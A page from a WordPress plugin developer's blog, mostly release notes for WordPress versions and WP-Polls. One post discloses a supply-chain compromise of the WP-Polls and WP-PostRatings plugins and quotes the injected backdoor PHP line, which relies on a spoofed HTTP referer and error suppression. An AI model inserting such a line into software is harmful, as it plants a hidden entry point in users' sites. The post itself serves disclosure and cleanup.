Lester Chan's WordPress Plugins – Page 27 – Lester Chan's WordPress Plugins Development Blog

WordPress 3.0.5 & 3.1 RC4

WordPress 3.0.5 & 3.1 RC4 has been released:

WordPress 3.0.5

WordPress 3.0.5 is now available and is a security hardening update for all previous WordPress versions.

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

Three point oh point five

Enhances security

Three point one comes soon

The release addresses a number of issues and provides two additional enhancements:

Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in previous release.

Thanks to Nils Jueneman and Saddy for their private and responsible disclosures to security@wordpress.org for two of the issues. The others were reported or repaired by our security team.

Changelog: WordPress 3.0.5
Download: WordPress 3.0.5
Download: Modified files since WordPress 3.0.4

WordPress 3.1 RC4

The Release Candidate 4 build includes the security fixes and enhancements included in 3.0.5 and addresses about two dozen additional bugs. This includes fixes for:

Deleting a user and reassigning their posts to another user.

Marking multiple users or sites as spam in multisite.

PHP4 compatibility.

As outlined in previous RC posts, if you are testing the release candidate and think you’ve found a bug, there are a few ways to let us know:

Post it to the Alpha/Beta area in the support forums

Report it to the wp-testers mailing list

Join the development IRC channel and tell us live at irc.freenode.net #wordpress-dev

File a bug ticket on the WordPress Trac

To test WordPress 3.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If any new issues become known, you’ll be able to find them here.

After nearly five months of development and testing, we think we’re very close to a final release. Users and developers, please test your themes and plugins.

Download: WordPress 3.1 RC4

(98 votes, average: 3.74 out of 5)

Code Injection Follow Up

I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.

The malicious code is as follows:
if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER'])) return;

The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it

I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.

(93 votes, average: 3.74 out of 5)

WordPress 3.2

WordPress 3.2 has been released and over at the US, it is 4th July aka Independence Day!

Here in the U.S. we are observing Independence Day, and I can’t think of a more fitting way to mark a day that celebrates freedom than by releasing more free software to help democratize publishing around the globe. I’m excited to announce that WordPress 3.2 is now available to the world, both as an update in your dashboard and a download on WordPress.org. Version 3.2 is our fifteenth major release of WordPress and comes just four months after 3.1 (which coincidentally just passed the 15 million download mark this morning), reflecting the growing speed of development in the WordPress community and our dedication to getting improvements in your hands as soon as possible. We’re dedicating this release to noted composer and pianist George Gershwin.

The focus for this release was making WordPress faster and lighter. The first thing you’ll notice when you log in to 3.2 is a refreshed dashboard design that tightens the typography, design, and code behind the admin. (Rhapsody in Grey?) If you’re starting a new blog, you’ll also appreciate the fully HTML5 new Twenty Eleven theme, fulfilling our plan to replace the default theme every year. Start writing your first post in our redesigned post editor and venture to the full-screen button in the editing toolbar to enter the new distraction-free writing or zen mode, my personal favorite feature of the release. All of the widgets, menus, buttons, and interface elements fade away to allow you to compose and edit your thoughts in a completely clean environment conducive to writing, but when your mouse strays to the top of the screen your most-used shortcuts are right there where you need them. (I like to press F11 to take my browser full-screen, getting rid of even the OS chrome.)

Under the hood there have been a number of improvements, not the least of which is the streamlining enabled by our previously announced plan of retiring support for PHP4, older versions of MySQL, and legacy browsers like IE6, which allows us to take advantage of more features enabled by new technologies. The admin bar has a few more shortcuts to your most commonly-used actions. On the comment moderation screen, the new approve & reply feature speeds up your conversation management. You’ll notice in your first update after 3.2 that we’ll only be updating the files that have changed with each new release instead of every file in your WordPress installation, which makes updates significantly faster on all hosting platforms. There are also some fun new theme features shown off by Twenty Eleven, like the ability to have multiple rotating header images to highlight all of your favorite photos

Download: WordPress 3.2
Codex: WordPress 3.2
Trac: WordPress 3.2

(226 votes, average: 3.73 out of 5)

WordPress 2.6.1

WordPress 2.6.1 has been released and it is a very minor release. Not security flaws has been found and hence WordPress 2.6.1 is not a security fix so if you are comfortable with WordPress 2.6 like me, you don’t have to upgrade.

2.6.1 offers several improvements for international users. Styling of the admin for right-to-left languages is much improved thanks to the efforts of the Farsi and Hebrew translation teams, and a mysterious gettext bug caused by certain PHP configurations is now fixed. For IIS users, 2.6.1 fixes several permalink problems. Image insertion problems in the Press This feature experienced by IE users are also fixed. Of note to everyone is a fix for a performance bug in the admin where those with a lot of plugins would experience slowness on some pages.

I am so looking forward to WordPress 2.7 as lots of features which are available as plugin will be built into the core.

Download WordPress 2.6.1

*UPDATE* I decided to upgrade to stopped the nagging upgrading message to appear.

(210 votes, average: 3.73 out of 5)

WP-Polls 2.11 Released

WP-Polls 2.11
» NEW: You Can Now Place The Poll On The Sidebar As A Widget
» NEW: Moved wp-polls.php To wp-content/plugins/polls/ Folder
» FIXED: AJAX Not Working In Opera Browser
» FIXED: Poll Not Working On Physical Pages That Is Integrated Into WordPress
» Download WP-Polls 2.11

(171 votes, average: 3.73 out of 5)